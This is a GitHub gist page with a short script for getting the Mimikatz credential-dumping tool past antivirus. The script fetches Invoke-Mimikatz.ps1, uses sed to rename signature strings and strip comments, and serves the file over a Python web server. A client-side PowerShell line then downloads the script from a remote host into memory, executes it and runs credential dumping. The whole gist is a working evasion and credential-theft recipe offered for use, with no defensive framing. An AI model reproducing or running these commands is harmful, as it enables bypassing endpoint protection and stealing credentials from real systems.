Skip to content

Instantly share code, notes, and snippets.

@gavz
Forked from PaulSec/invoke_evasion.sh
Created August 1, 2017 18:38
Show Gist options
  • Save gavz/578a6f72e62e3abe2a384657d6191ac0 to your computer and use it in GitHub Desktop.
Save gavz/578a6f72e62e3abe2a384657d6191ac0 to your computer and use it in GitHub Desktop.
Small script to bypass AV that triggers Invoke-Mimikatz with shitty rules
# AV Bypass to run Mimikatz
# From: https://www.blackhillsinfosec.com/?p=5555
# Server side:
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1
sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1
python -m SimpleHTTPServer 3615
# Client-side:
Invoke-Expression (New-Object Net.Webclient).downloadstring('http://x.x.x.x:3615/Invoke-Mimikatz.ps1')
Invoke-Mimidogz
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment